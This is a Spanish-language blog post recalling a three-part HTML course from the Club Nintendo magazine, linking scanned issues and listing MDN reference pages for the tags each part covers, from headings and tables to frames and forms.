### 🔍 Example
```ruby
# app/components/button_component.rb
class ButtonComponent < Phlex::HTML
def initialize(title:, path:)
@title = title
@path = path
end
def template
a(href: @path, class: "btn") { @title }
end
end
```
```erb
# In the template to render the component
<%= ButtonComponent.new(title: "Click Me", path: profile_path).call %>
```
---
## [React + Rails](https://github.com/reactjs/react-rails)
### ✅ Pros:
- **Popularity**: Large community and vast resources available.
- **Interactivity**: Ideal for building dynamic and responsive user interfaces.
- **Ecosystem**: Strong integration with modern front-end development tools.
### ❌ Cons:
- **Complexity**: Adds a layer of complexity, requiring state management and tools like Webpack.
- **Performance**: Can introduce overhead if not used efficiently.
### 🔍 Example
```sh
# Create the Button component
rails generate react:component Button title:string path:string
```
```jsx
// app/javascript/components/Button.js
import React from 'react';
const Button = ({ title, path }) => (
<a href={path} className="btn">
{title}
</a>
);
export default Button;
```
```erb
# In the template to render the component
<%= react_component("Button", { title: "Click Me", path: profile_path }) %>
```
---
## [Rux](https://github.com/camertron/rux-rails)
### ✅ Pros:
- **JSX-like Syntax**: Combines the power of JSX with the simplicity of Ruby, making it easier to create visual components.
- **Integration**: Allows easy integration with existing Ruby libraries and frameworks.
### ❌ Cons:
- **Novelty**: Relatively new tool, may have less stability and support.
- **Adaptation**: Requires a slightly different development mindset, which can be challenging for traditional Ruby developers.
### 🔍 Example
```ruby
# app/components/button_component.rux
class ButtonComponent < Rux::Component
props :title, :path
def render
rux do
a(href: @path, class: "btn") { @title }
end
end
end
```
```erb
# In the template to render the component
<%= render(ButtonComponent.new(title: "Click Me", path: profile_path)) %>
```
---
## [Cells](https://github.com/trailblazer/cells)
### ✅ Pros:
- **Isolation**: Isolates view logic in cells, improving modularity.
- **Reusability**: Facilitates the reuse of components in different parts of the application.
### ❌ Cons:
- **Performance**: Can be slower compared to other alternatives due to rendering overhead.
- **Learning Curve**: Requires familiarity with the cell paradigm, which can be challenging for some developers.
### 🔍 Example
```sh
# Create the Button component
rails generate cell Button title path
```
```ruby
# app/cells/button_cell.rb
class ButtonCell < Cell::ViewModel
property :title
property :path
def show
render
end
end
```
```erb
# app/cells/button/show.erb
<a href="<%= path %>" class="btn">
<%= title %>
</a>
```
```erb
# In the template to render the component
<%= cell(:button, title: "Click Me", path: profile_path)) %>
```
---
## 🔄 Tool Comparisons
### ♻️ Reusability and Modularity
- **ViewComponent**: Excellent for encapsulating and reusing view logic in cohesive components.
- **Phlex**: Similar to ViewComponent but with a more object-oriented syntax.
- **React + Rails**: Highly reusable, especially with the vast amount of available React libraries.
- **Rux**: Good reusability with a syntax approach that resembles JSX.
- **Cells**: Facilitates the creation of modular and reusable components.
### ⚡ Performance
- **ViewComponent**: Superior performance due to precompiled templates.
- **Phlex**: Efficient in rendering components, though with less community support.
- **React + Rails**: Can be efficient but requires good state management and optimization to avoid overhead.
- **Rux**: Promises good performance, but being a new tool, it might not be as well-tested as other options.
- **Cells**: Can suffer from slower performance due to rendering overhead.
### 📚 Learning Curve
- **ViewComponent**: Can be challenging for beginners but powerful for experienced users.
- **Phlex**: More intuitive for Ruby developers but with less documentation.
- **React + Rails**: Can have a steep learning curve due to the need to learn both React and Rails.
- **Rux**: Requires adaptation to a new development mindset.
- **Cells**: Requires understanding of the cell paradigm, which can be difficult for some developers.
---
## Considerations
Choosing the ideal tool for creating components in Rails depends on various factors, including project complexity, team familiarity with the technology, and specific performance and maintenance needs. Here are some additional considerations:
- **Project Size**: For smaller projects, simpler tools like ViewComponent or Phlex may be more suitable due to their ease of use and lower overhead. In larger projects, using React can be more advantageous due to its ability to manage complex and dynamic user interfaces.
- **Team and Knowledge**: The learning curve is a crucial factor. If your team is already familiar with React, opting for React + Rails might be the most logical choice. On the other hand, if the team is primarily composed of Ruby developers, tools like Phlex or ViewComponent may provide a smoother integration.
- **Maintenance and Testability**: ViewComponent and Cells offer significant advantages in terms of testability and maintenance. If code quality and test coverage are priorities, these tools should be considered.
- **Performance**: Tools like ViewComponent and Phlex offer excellent performance due to efficient rendering. If performance is a critical factor, these tools should be closely examined.
Regardless of the choice, creating components can significantly improve the quality, maintenance, and scalability of your code. By adopting one of these tools, you will be better prepared to face the challenges of modern web development.
Good luck with developing your components in Rails! Happy coding! | fbzsaullo |
1,881,475 | June Frontend Challenge: Birthday Month | This is a submission for Frontend Challenge v24.04.17, CSS Art: June. Inspiration June... | 0 | 2024-06-08T18:19:39 | https://dev.to/codewithtee/june-frontend-challenge-birthday-month-2boi | frontendchallenge, devchallenge, css | _This is a submission for [Frontend Challenge v24.04.17](https://dev.to/challenges/frontend-2024-05-29), CSS Art: June._
## Inspiration
June brings memories of my baby brother’s birthday; he turns 25 this year, no longer the little one he used to be.
## Demo
{% codepen https://codepen.io/tabassum2507/pen/qBGXXBM %}
## Journey
Creating this CSS animation was a rewarding challenge that required a detailed understanding of various CSS properties and techniques. The process involved layering multiple elements to simulate a birthday cake with intricate shadow effects and a gift box animation.
### Process:
Setup and Layout:
- Used flex for centering the main elements on the screen.
- Defined the base structure for the cake and the gift using basic CSS properties.
Cake Design:
- Utilized the box-shadow property creatively to add multiple layers to the cake.
- Applied pseudo-elements (::before and ::after) to add decorative parts like the white shadow and the number on the cake.
Gift Box Animation:
- Implemented a checkbox hack to control the animation state.
- Positioned the gift box and designed the ribbon using ::before and ::after.
- Used transition and transform properties to animate the gift opening effect.
Sparkles Animation:
- Created sparkles using small, circular elements with animated @keyframes to simulate a burst effect.
- Combined opacity, transform, and color animations for dynamic visual effects.
| codewithtee |
1,881,474 | 100 Days To Offload - completed | This is the 100th blog post since June 10th 2023, which means that the 100 Days To Offload challenge... | 0 | 2024-06-08T18:19:30 | https://dev.to/stefanalfbo/100-days-to-offload-completed-3n2b | 100daystooffload, blog, writing, challenge | This is the 100th blog post since June 10th 2023, which means that the [100 Days To Offload](https://100daystooffload.com/) challenge has been completed.
> The whole point of #100DaysToOffload is to challenge you to publish 100 posts on your personal blog in a year.
It has been a long road but it really feels nice to be done with the challenge now, and hopefully I will be able to keep writing blog posts pretty regular in the future too.
However now it's time for summer here in Sweden!
Until next time! | stefanalfbo |
1,881,472 | Unlocked a new GPT functionality: performance calculations | So I was curious if using a super long hash would impact my apps performance. Asked ChatGPT 4o: ... | 0 | 2024-06-08T18:11:26 | https://dev.to/buildwebcrumbs/unlocked-a-new-gpt-functionality-performance-calculations-5ccf | programming, webdev, performance, ai | So I was curious if using a super long hash would impact my apps performance.
Asked ChatGPT 4o:
### 1. What's the performance comparison between x and y?
In this example, x and y were:
```javascript
const hash = crypto.createHash('sha256').update(message + code + (files ? files.map(f => f.buffer.toString('hex')).join('') : '') + uniqueValue).digest('hex');
```
```javascript
const hash = crypto.createHash('sha256').update(uniqueValue).digest('hex');
```
Okay. It blabed a little bit. It even wrote the code so I could verify it. But I wanted an answer. So second and last iteration:
### 2. Can you run and let me know? Use fake data as input
And bum! Got my answer in a few seconds.
> The performance comparison between the two methods is as follows:
>
> Long Input Hash:
> 0.1235 seconds for 100,000 iterations
>
> Short Input Hash:
> 0.1061 seconds for 100,000 iterations
>
> As expected, the short input hash is slightly faster. The difference, while measurable, is relatively small. This indicates that if you are hashing a relatively small number of times, the performance impact will be minimal. However, if you need to optimize for the fastest possible hashing in a high-frequency context, using a short input value like a unique counter or timestamp is the better option.
Hope it helps!
Happy coding. | opensourcee |
1,881,471 | Testing with AI: Revolutionizing Software Quality Assurance | The rapid advancements in artificial intelligence (AI) have transformed various industries, and... | 0 | 2024-06-08T18:08:26 | https://dev.to/keploy/testing-with-ai-revolutionizing-software-quality-assurance-51e1 | ai, testing, opensource, saas |

The rapid advancements in artificial intelligence (AI) have transformed various industries, and software testing is no exception. [Testing with AI](https://keploy.io/blog/community/exploring-end-to-end-testing-with-ai) involves leveraging machine learning algorithms, neural networks, and other AI technologies to enhance the efficiency, accuracy, and scope of software testing. This article explores the integration of AI in software testing, highlighting its benefits, methodologies, challenges, and the future landscape of this emerging field.
**The Role of AI in Software Testing**
AI brings a paradigm shift in how software testing is approached, offering solutions that go beyond traditional manual and automated testing methods. By harnessing the power of AI, software testing can achieve:
1. Enhanced Test Automation: AI-driven test automation tools can generate, execute, and maintain test scripts more efficiently than traditional automation frameworks.
2. Intelligent Test Case Generation: AI can analyze code changes and usage patterns to generate relevant and high-priority test cases.
3. Predictive Analytics: AI can predict potential defects and areas of risk in the software, allowing testers to focus on critical areas.
4. Continuous Learning: AI systems can continuously learn from past data and testing results, improving their accuracy and efficiency over time.
5. Test Optimization: AI can optimize test suites by identifying redundant or obsolete test cases, thereby reducing the overall testing time and effort.
**Benefits of AI in Software Testing**
1. Efficiency and Speed: AI accelerates the testing process by automating repetitive and time-consuming tasks, allowing testers to focus on more complex and critical issues.
2. Improved Accuracy: AI reduces human error by consistently executing tests and analyzing results with precision.
3. Scalability: AI-driven testing can handle large volumes of data and complex testing scenarios, making it suitable for large-scale applications.
4. Early Defect Detection: AI can identify patterns and anomalies in the early stages of development, enabling quicker resolution of defects.
5. Cost Savings: By automating routine tasks and optimizing test efforts, AI can significantly reduce the cost of software testing.
**Methodologies in AI-Driven Testing**
AI can be applied to various aspects of software testing, including test case generation, test execution, and defect prediction. Here are some key methodologies:
1. Test Case Generation:
o Model-Based Testing: AI models analyze the application’s requirements and design to automatically generate test cases.
o User Behavior Analysis: AI uses historical user data to simulate real-world usage patterns and generate test cases accordingly.
2. Test Execution:
o Autonomous Testing: AI systems can autonomously execute tests, adapt to changes in the application, and report results without human intervention.
o Self-Healing Automation: AI-driven tools can detect and fix broken test scripts caused by changes in the application’s UI or functionality.
3. Defect Prediction:
o Predictive Analytics: Machine learning algorithms analyze historical defect data to predict the likelihood and location of future defects.
o Anomaly Detection: AI can identify anomalies in the software’s behavior that may indicate potential defects.
4. Natural Language Processing (NLP):
o Requirement Analysis: NLP techniques can analyze and interpret natural language requirements to generate test cases.
o Bug Triage: AI can classify and prioritize bug reports based on their severity and impact.
**Tools and Technologies**
Several AI-driven tools and frameworks have emerged to facilitate AI-based software testing. Some notable ones include:
1. Applitools: Uses visual AI to automate visual testing and ensure the UI looks and functions correctly across different devices and browsers.
2. Testim: Leverages machine learning to create, execute, and maintain automated tests, adapting to changes in the application.
3. Functionize: Uses AI to generate and execute functional tests, reducing the need for manual scripting.
4. Sealights: Employs machine learning to analyze code changes and test coverage, optimizing the testing process.
5. Mabl: Utilizes AI for end-to-end testing, including test creation, execution, and maintenance, with a focus on user experience.
**Challenges and Limitations**
Despite its potential, testing with AI faces several challenges and limitations:
1. Data Quality and Quantity: AI models require large volumes of high-quality data for training. Insufficient or poor-quality data can lead to inaccurate predictions and results.
2. Complexity of AI Models: Developing and fine-tuning AI models for testing can be complex and requires specialized knowledge and expertise.
3. Integration with Existing Tools: Integrating AI-driven testing tools with existing software development and testing workflows can be challenging.
4. Interpretability: AI models, especially deep learning algorithms, can be difficult to interpret, making it hard to understand the reasoning behind their predictions and decisions.
5. Initial Investment: Implementing AI-driven testing solutions may require significant initial investment in terms of tools, infrastructure, and training.
**Future Trends and Outlook**
The future of AI in software testing looks promising, with several trends and advancements on the horizon:
1. AI-Augmented Testing: AI will increasingly augment human testers, providing them with intelligent insights and recommendations to enhance their testing efforts.
2. Integration with DevOps: AI-driven testing will become more integrated with DevOps practices, enabling continuous testing and delivery.
3. Cognitive QA: The development of cognitive QA systems that can understand, learn, and reason about software quality will further automate and optimize testing processes.
4. Explainable AI: Advances in explainable AI will make it easier to understand and trust AI-driven testing results.
5. Collaborative AI: AI systems that collaborate and communicate with each other to share insights and improve testing efficiency will emerge.
**Conclusion**
Testing with AI represents a significant leap forward in software quality assurance. By leveraging AI technologies, organizations can enhance the efficiency, accuracy, and scope of their testing efforts, ultimately delivering higher-quality software products. While challenges remain, the ongoing advancements in AI and machine learning promise to address these issues and unlock new possibilities in software testing. As AI continues to evolve, its integration into testing processes will become more seamless, driving innovation and excellence in software development. | keploy |
1,881,470 | Using Zsh and zsh-autosuggestions on Windows Terminal with Oh My Posh theme | This article contains unstructions on how to configure Windows Terminal to use Oh My Posh with Zsh... | 0 | 2024-06-08T18:05:05 | https://dev.to/goranvasic/using-zsh-and-zsh-autosuggestions-on-windows-terminal-with-oh-my-posh-theme-do6 | This article contains unstructions on how to configure Windows Terminal to use Oh My Posh with Zsh and zsh-autosuggestions.
This approach is not relying on [WSL](https://learn.microsoft.com/en-us/windows/wsl/), it is utilizing existing Git installation on Windows. This way, you can have fully functional Zsh shell with autocomplete natively on Windows, just like you would on Mac.
---
Some people recommend using [ble.sh – Bash Line Editor](https://github.com/akinomyoga/ble.sh), a command line editor written in pure Bash which replaces the default GNU Readline (mentioned in [Bash vs ZSH vs Fish: What's the Difference?](https://www.youtube.com/watch?v=dRdGq8khTJc)). However, on Windows I still prefer using Zsh with `zsh-autosuggestions`.
## Configuration Instructions
- Download and install Git from [git-scm](https://git-scm.com/). Make sure to uncheck suggested options for Git Bash (e.g. the 2 options under "Windows Explorer integration"). You can select the option to add a Git Bash Profile to Windows Terminal, we will modify it manually later. When asked about adjusting your PATH environment, I like to use the Recommended setting, and I also like to enable symbolic links. I usually keep everything else on default.
- From Microsoft Store, install [Windows Terminal](https://www.microsoft.com/store/productId/9N0DX20HK701) and `winget` [App Installer](https://www.microsoft.com/store/productId/9NBLGGH4NNS1). Check if everything has been installed properly by opening a new Windows Terminal session and typing `winget --version`.
- Open your Windows Start menu, and search for "PowerShell".
- Run Windows PowerShell as Administrator, then install [Oh My Posh](https://ohmyposh.dev/docs/installation/windows) using `winget`, for example:
```shell
winget install JanDeDobbeleer.OhMyPosh -s winget
```
- Close PowerShell, then add `oh-my-posh` path to your Windows environment variables (User):
1. Press `Win + r`.
2. Type in `control` and hit `ENTER`.
3. Navigate to "User Accounts".
4. Click on "User Accounts" one more time, then click the "Change my environment variables" link on the left side to open the "Environment Variables" window.
5. In the upper (User) part of the window, scroll down and select `Path`, then click the `Edit...` button.
6. Depending on the way your variables are displayed, either click `New` to add a new variable, or add a `;` at the end of the line, then type in `%LOCALAPPDATA%\Programs\oh-my-posh\bin` for the value. It might be that this value already exists, in which case you don't need to edit anything.
7. Press `OK`, then confirm every previously opened window by clicking `OK`.
- Run PowerShell one more time with Administrator privileges, then install either the `FiraCode Nerd Font` or `SauceCodePro Nerd Font` (I prefer `SourceCodePro`) from [Nerd Fonts](https://www.nerdfonts.com/font-downloads) using the following command (follow their instructions in order to select the desired font):
```shell
oh-my-posh font install
```
- Start a new Git Bash terminal by double-clicking on `git-bash.exe` located under `C:\Program Files\Git\`.
- Download the [Zsh for Windows package](https://packages.msys2.org/package/zsh?repo=msys&variant=x86_64) `zsh~x86_64.pkg.tar.zst` by executing the following command:
```shell
curl -fsLo $HOME/zsh-5.9-2-x86_64.pkg.tar.zst https://mirror.msys2.org/msys/x86_64/zsh-5.9-2-x86_64.pkg.tar.zst
```
- In Windows Explorer, locate the downloaded `.zst` file in your home directory and extract it either using:
- [PeaZip](https://peazip.github.io/), which can be installed using the `winget install -e peazip` command, or
- [7-Zip](https://www.7-zip.org/download.html) (I prefer this option, since I already have it installed).
- You only need the `etc` and `usr` directories, so copy these two directories from the extracted folder into `C:\Program Files\Git` and when prompted, select the option to overwrite all existing files – don't worry, these two directories (`etc` and `usr`) contain completely new files, no existing files will be overwritten.
- Open `%PROGRAMFILES%/Git/etc/profile` in your text editor as Administrator (because you might need elevated privileges in order to save the changes) and:
- Comment out the entire block near the bottom of the file that starts with line `if [ ! "x${BASH_VERSION}" = "x" ]; then` and ends with line `fi`. At the moment of writing the article, I commented out lines `111-133`. We don't need all of this code since we know we will be using Zsh.
- Below the commented out block, add the following 3 lines:
```shell
HOSTNAME="$(exec /usr/bin/hostname)"
profile_d zsh
SHELL='/usr/bin/zsh'
```
- Save the changes.
- Open the Windows Start menu, search for "Terminal" and start it.
- Open Windows Terminal's settings using the `Ctrl + Shift + ,` keyboard shortcut, then under the `profiles > list` array modify the existing Bash profile, or add a new profile:
```json
{
"name": "Git Bash",
"guid": "{12398ec4-4e3d-5e58-b989-0a998ec441b1}",
"commandline": "%PROGRAMFILES%/git/usr/bin/zsh.exe -il",
"icon": "%USERPROFILE%/git.ico",
"startingDirectory": "%USERPROFILE%",
"colorScheme": "VibrantInk",
"font":
{
"face": "SauceCodePro NFM"
},
"useAcrylic": true,
"opacity": 70,
"adjustIndistinguishableColors": "always",
"bellStyle": "none",
"hidden": false
}
```
- HINT: For the code mentioned above, make sure to add the `,` character after the closing curly brace, if needed, so that the settings file syntax is valid.
- The profile above uses a custom `~/git.ico` icon, so you can either reference the default `git-for-windows.ico` icon file under `C:\Program Files\Git\mingw64\share\git` or find another one you like.
- If you wish, you can also set the above profile to be your default Windows Terminal profile by setting the same `guid` as the `defaultProfile` value in the settings JSON.
- Restart Windows Terminal and verify that everything is working (configure `zsh` using the interactive menu).
- Execute the following command from any location to install [Oh My Zsh](https://ohmyz.sh/) under your `$HOME/.oh-my-zsh` directory:
```shell
sh -c "$(curl -fsSL https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh)"
```
- Clone `zsh-autosuggestions` using the following command:
```shell
git clone https://github.com/zsh-users/zsh-autosuggestions.git $ZSH_CUSTOM/plugins/zsh-autosuggestions
```
- Open `~/.zshrc` file, comment out the line that sets `ZSH_THEME` on line 11 (we will be using Oh My Posh theme, not Oh My Zsh), then below on line 73, add the `zsh-autosuggestions` plugin to `oh-my-zsh` plugins:
```text
plugins=(
git
zsh-autosuggestions
)
```
- Save the changes and verify that autosuggestions are working (you need to have something in your history first, so type a couple of commands in Windows Terminal, exit with `logout`, then start the Terminal again). NOTE: On first run, `~/.zcompdump` file will be created, so it is normal for Terminal to start a bit slower.
- Grab the [Gocilla theme](https://github.com/goranvasic/gocilla-oh-my-posh/blob/main/gocilla.omp.json) for `Oh My Posh` and save the file under `oh-my-posh` themes:
```shell
curl -fsLo $HOME/AppData/Local/Programs/oh-my-posh/themes/gocilla.omp.json https://raw.githubusercontent.com/goranvasic/gocilla-oh-my-posh/main/gocilla.omp.json
```
- Navigate to your Windows `%USERPROFILE%` directory, and open the `.zshrc` file one more time.
- Add the following line below the `source $ZSH/oh-my-zsh.sh` line:
```shell
eval "$(oh-my-posh init zsh --config $HOME/AppData/Local/Programs/oh-my-posh/themes/gocilla.omp.json)"
```
- Restart Windows Terminal and verify that everything is working properly.
That's it. Hopefully this works on your side. You can run this customized Zsh in IntelliJ or VS Code by setting the built-in terminal to open `"C:\Program Files\Git\usr\bin\zsh.exe" -il`.
You can find the latest version of these instructions on my GitHub repo [here](https://github.com/goranvasic/gocilla-oh-my-posh). Any comments or suggestions for improvement will be much appreciated.
| goranvasic | |
1,881,469 | Explore 3m car tinting in Dubai! | Get the best protection for your car in Dubai with AutoCare's expert 3M tinting deals Dubai services!... | 0 | 2024-06-08T17:59:41 | https://dev.to/tylor_addinson_d3ab9981fa/explore-3m-car-tinting-in-dubai-lf6 | Get the best protection for your car in Dubai with AutoCare's expert 3M **[tinting deals Dubai](https://autocare.ae/)** services! Say goodbye to harsh heat and UV rays with our high-quality 3M tints that reject up to 97% of infrared rays and block out 99% of harmful UV rays. Enjoy enhanced privacy, reduced glare, and a sleek, stylish look that will make your car stand out. At AutoCare, our experienced technicians use genuine 3M products and state-of-the-art facilities to ensure a flawless finish that lasts up to 10 years. Don't settle for less - choose AutoCare for top-notch 3M tinting that provides unparalleled protection and style. Contact us today to schedule your appointment and experience the difference for yourself! Call/WhatsApp +971 50 821 4093 or visit our website AutoCare.ae to learn more! | tylor_addinson_d3ab9981fa | |
1,881,468 | 🚨 CSS Injection on GitHub: What Happened and How to Stay Safe 🚨 | 🚨 CSS Injection on GitHub: What Happened and How to Stay Safe 🚨 Hey Dev.to community! 🌟 I... | 0 | 2024-06-08T17:59:36 | https://dev.to/sh20raj/css-injection-on-github-what-happened-and-how-to-stay-safe-j2h | github, css | ## 🚨 CSS Injection on GitHub: What Happened and How to Stay Safe 🚨
Hey Dev.to community! 🌟
I wanted to bring your attention to a recent security issue involving CSS injection on GitHub. This incident has been a hot topic and underscores the importance of staying vigilant with web security. Let's break down what happened, the implications, and how we can protect our projects from such vulnerabilities.
### What Happened? 🕵️♂️
Recently, a CSS injection vulnerability was discovered on GitHub profiles. This type of attack allows malicious users to inject unauthorized CSS code into web pages, potentially altering their appearance and behavior in harmful ways. Steve Matindi wrote an insightful article on Medium titled ["CSS Injection on GitHub Profiles: From Unicode Exploits to New Bypass Techniques"](https://stevemats.medium.com/css-injection-on-github-profiles-from-unicode-exploits-to-new-bypass-techniques-f73f343f05d8), where he explained how these exploits work and detailed both old and new methods attackers have used.
### The Original Exploit: Unicode Command Injection
Initially, attackers found a way to inject CSS styles using LaTeX math mode with the `\unicode` command. Here’s an example of the code used:
```latex
$$\ce{$\unicode[goombafont; color:red; pointer-events: none; z-index: 100; position: fixed; top: 0; left: 0; height: 100vh; object-fit: cover; background-size: cover; width: 100vw; opacity: 1.0; background: url('https://github.com/stevemats/stong/blob/master/Rotating_cube_SMIL.svg?raw=true');]{x0000}$}$$
```
This code injected styles that altered the appearance of a profile page by placing an image as the background and applying various CSS properties.
### GitHub’s Response: Blocking the Unicode Command
To counter this exploit, GitHub blocked the `\unicode` command in LaTeX math mode. Users trying to use this command now see an error message: "The following macros are not allowed: \unicode."
### A New Bypass Technique: HTML Character Encoding
Despite GitHub's efforts, attackers found a new way to bypass the filter using HTML character encoding. Here’s an example of the updated exploit:
```latex
$$\ce{$\unicode[goombafont; color:red; pointer-events: none; z-index: -10; position: fixed; top: 0; left: 0; height: 100vh; object-fit: cover; background-size: cover; width: 130vw; opacity: 0.5; background: url('https://user-images.githubusercontent.com/30528167/92789817-e4b53d80-f3b3-11ea-96a4-dad3ea09d237.png?raw=true');]{x0000}$}$$
```
#### How It Works
1. **HTML Character Encoding**: The sequence `\` is the HTML entity for the backslash (`\`). This encoding helps avoid directly writing the `\unicode` command, which GitHub’s filter blocks.
2. **LaTeX Math Mode**: The code remains enclosed within LaTeX math mode markers (`$$...$$`), allowing LaTeX commands.
3. **Chemical Equation (`\ce`) Environment**: The `\ce` command acts as a wrapper, potentially disguising the intent of the code.
4. **Unicode Command Injection**: When decoded, the `\` entity is interpreted as a backslash, executing the `\unicode` command with the specified CSS properties.
### Why This Bypass Works
- **Encoding Trick**: By using `\`, the command is hidden from the filter that blocks `\unicode`.
- **Command Interpretation**: Once rendered, the encoded character is interpreted correctly, executing the command.
### GitHub's Continued Efforts
GitHub is actively addressing this new method by further tightening their filters and enhancing their security measures. These steps are crucial for several reasons:
- **Security Risks**: Arbitrary CSS injection poses significant security vulnerabilities, including phishing risks.
- **Site Integrity**: CSS injection can disrupt the site's consistent appearance and functionality.
- **Abuse Prevention**: Restrictions are necessary to prevent malicious actors from exploiting CSS injection for harmful activities.
- **User Experience**: Excessive styles can lead to poor user experiences, making profiles unusable or visually overwhelming.
### Protecting Your Projects 🚧
As developers, we must be proactive in safeguarding our projects against CSS injection and other security threats. Here are some best practices:
1. **Sanitize and Validate User Inputs**: Always ensure user inputs are sanitized and validated before processing or rendering them.
2. **Implement Content Security Policies (CSP)**: Use CSP headers to restrict the sources from which CSS and other resources can be loaded.
3. **Conduct Regular Security Audits**: Regularly audit your code and conduct security reviews to identify and fix vulnerabilities.
4. **Stay Informed**: Keep up with the latest security trends and updates.
### Resources 📚
To dive deeper into CSS injection and prevention techniques, check out these resources:
- [Security Boulevard: CSS Injection Prevention Guide](https://securityboulevard.com/2024/06/a-complete-guide-on-css-injection-prevention-examples-steps-included/)
- [OWASP: Cross-Site Scripting (XSS)](https://owasp.org/www-community/attacks/xss/)
- [MDN Web Docs: Content Security Policy (CSP)](https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP)
### Conclusion
Security vulnerabilities like CSS injection are a stark reminder of the ever-present threats in web development. By adopting best practices and staying vigilant, we can protect our projects and users from malicious attacks. Let’s all stay safe and keep coding securely! 💪✨
Feel free to share your thoughts and additional tips in the comments. Happy coding! 👩💻👨💻
---
*References:*
- [Steve Matindi's Medium Article](https://stevemats.medium.com/css-injection-on-github-profiles-from-unicode-exploits-to-new-bypass-techniques-f73f343f05d8)
- [Security Boulevard](https://securityboulevard.com/2024/06/a-complete-guide-on-css-injection-prevention-examples-steps-included/)
- [GitHub Blog](https://github.blog/2024/06/fixing-security-vulnerabilities-with-ai/)
---
I hope this helps! If you have any further details or specific questions about the vulnerability, feel free to ask. 😊
---
Tweets
{% twitter https://twitter.com/cloud11665/status/1799136093071163396 %}
{% twitter https://twitter.com/gf_256/status/1799197013629645101 %}
| sh20raj |
1,881,466 | Dynamic Testimonial Showcase Slider | Explore this dynamic testimonial showcase, crafted with Swiper Slider. Engage visitors with... | 0 | 2024-06-08T17:52:29 | https://dev.to/creative_salahu/dynamic-testimonial-showcase-slider-56ep | codepen | Explore this dynamic testimonial showcase, crafted with Swiper Slider. Engage visitors with compelling client testimonials, accompanied by company logos and names. Seamless navigation and responsiveness ensure a delightful user experience across devices. Elevate your website's credibility and user engagement with this sleek slider!
{% codepen https://codepen.io/CreativeSalahu/pen/xxNLXVK %} | creative_salahu |
1,881,465 | An nhien Healthy | A post by An nhien Healthy | 0 | 2024-06-08T17:52:16 | https://dev.to/annhienhealthy/an-nhien-healthy-2glp | annhienhealthy | ||
1,881,463 | 523. Continuous Subarray Sum | 523. Continuous Subarray Sum Medium Given an integer array nums and an integer k, return true if... | 27,523 | 2024-06-08T17:50:39 | https://dev.to/mdarifulhaque/523-continuous-subarray-sum-2b4 | php, leetcode, algorithms, programming | 523\. Continuous Subarray Sum
Medium
Given an integer array nums and an integer k, return `true` _if `nums` has a **good subarray** or false otherwise_.
A **good subarray** is a subarray where:
- its length is **at least two**, and
- the sum of the elements of the subarray is a multiple of `k`.
Note that:
- A **subarray** is a contiguous part of the array.
- An integer `x` is a multiple of `k` if there exists an integer `n` such that `x = n * k`. `0` is **always** a multiple of `k`.
**Example 1:**
- **Input:** nums = [23,<u>2,4</u>,6,7], k = 6
- **Output:** true
- **Explanation:** [2, 4] is a continuous subarray of size 2 whose elements sum up to 6.
**Example 2:**
- **Input:** nums = [<u>23,2,6,4,7</u>], k = 6
- **Output:** true
- **Explanation:** [23, 2, 6, 4, 7] is an continuous subarray of size 5 whose elements sum up to 42.
42 is a multiple of 6 because 42 = 7 * 6 and 7 is an integer.
**Example 3:**
- **Input:** nums = [23,2,6,4,7], k = 13
- **Output:** false
**Constraints:**
- <code>1 <= nums.length <= 10<sup>5</sup></code>
- <code>0 <= nums[i] <= 10<sup>9</sup></code>
- <code>0 <= sum(nums[i]) <= 2<sup>31</sup> - 1</code>
- <code>1 <= k <= 2<sup>31</sup> - 1</code>
**Solution:**
```
class Solution {
/**
* @param Integer[] $nums
* @param Integer $k
* @return Boolean
*/
function checkSubarraySum($nums, $k) {
$prefixMod = 0;
$modSeen = array();
$modSeen[0] = -1;
for ($i = 0; $i < count($nums); $i++) {
$prefixMod = ($prefixMod + $nums[$i]) % $k;
if (array_key_exists($prefixMod, $modSeen)) {
if ($i - $modSeen[$prefixMod] > 1) return 1;
} else {
$modSeen[$prefixMod] = $i;
}
}
return 0;
}
}
```
**Contact Links**
- **[LinkedIn](https://www.linkedin.com/in/arifulhaque/)**
- **[GitHub](https://github.com/mah-shamim)** | mdarifulhaque |
1,881,467 | La revista Club Nintendo y su curso de HTML | ¿Recuerdas esta revista?, Sabías que tenía un curso de HTML en 1997 | 0 | 2024-06-08T17:47:00 | https://dev.to/javascriptchile/la-revista-club-nintendo-y-su-curso-de-html-264c | html, clubnintendo, principiante, chile | ---
title: La revista Club Nintendo y su curso de HTML
published: true
description: ¿Recuerdas esta revista?, Sabías que tenía un curso de HTML en 1997
tags: html, clubnintendo, principiante, chile
cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0qq99v6sv47tjpmn0o2b.png
# Use a ratio of 100:42 for best results.
published_at: 2024-06-08 17:47 +0000
---
Quiero compartir el curso que inicio mi interés por la informática.
El curso de HTML de la revista Club Nintendo. Encontré los escaneos de la versión
mexicana, aunque yo leí la edición chilena. El contenido es el mismo.
## Primera Parte
https://archive.org/embed/club-nintendo-ano-06-no-05-mexico
Página 44. Introducción al HTML.
Etiquetas básicas como `<h1>`, `<img>` y los colores hexadecimales. Tablas y listas.
### Conceptos
- https://developer.mozilla.org/es/docs/Web/HTML
- https://developer.mozilla.org/en-US/docs/Web/HTML/Element/Heading_Elements
- https://developer.mozilla.org/es/docs/Web/CSS/color
- https://developer.mozilla.org/es/docs/Web/API/HTMLTableElement
- https://developer.mozilla.org/es/docs/Web/HTML/Element/menu
- https://developer.mozilla.org/es/docs/Web/HTML/Element/li
- https://developer.mozilla.org/es/docs/Web/HTML/Element/img
- https://developer.mozilla.org/en-US/docs/Web/HTML/Element/center
- https://developer.mozilla.org/es/docs/Web/HTML/Element/br
## Segunda Parte
https://archive.org/embed/club-nintendo-ano-06-no-10-mexico
Página 44. Mapas de imagenes. Frames, enlaces.
### Conceptos
- https://developer.mozilla.org/es/docs/Web/HTML/Element/map
- https://developer.mozilla.org/es/docs/Web/HTML/Element/frame
- https://developer.mozilla.org/es/docs/Web/HTML/Element/frameset
- https://developer.mozilla.org/es/docs/Web/HTML/Element/a
- https://developer.mozilla.org/es/docs/Web/HTML/Element/sub
- https://developer.mozilla.org/es/docs/Web/HTML/Element/sup
- https://developer.mozilla.org/es/docs/Web/HTML/Element/hr
- https://developer.mozilla.org/es/docs/Web/HTML/Element/u
## Tercera Parte (final)
https://archive.org/embed/club-nintendo-ano-06-no-11-mexico
Página 52. Formularios y un poquito de Javascript.
### Conceptos
- https://developer.mozilla.org/es/docs/Web/HTML/Element/form
- https://developer.mozilla.org/es/docs/Web/HTML/Element/input
